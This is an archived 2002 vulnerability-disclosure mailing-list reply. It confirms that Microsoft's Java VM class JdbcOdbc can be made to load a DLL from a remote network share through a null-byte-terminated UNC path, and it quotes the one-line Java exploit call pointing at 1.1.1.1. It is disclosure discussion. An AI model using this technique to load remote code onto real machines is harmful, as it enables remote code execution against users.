|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Jouko Pynnonen (jouko_at_SOLUTIONS.FI)
Date: Mon Sep 23 2002 - 10:41:15 CDT
On Mon, 23 Sep 2002, Georgi Guninski wrote:
> Does
> new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000");
> work?
Yes, seems to work, so there's another way to exploit this one. It
requires that browsing internet shares works, which may limit the systems
where it can be exploited. Although there were other Java vulnerabilities
involving the use of shares, I never came to think about this way. MS may
have thought of this, but of course they don't mention this kind of
things during the "co-operation".
-- Jouko Pynnonen Online Solutions Ltd Secure your Linux - joukosolutions.fi http://www.solutions.fi http://www.secmod.com
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]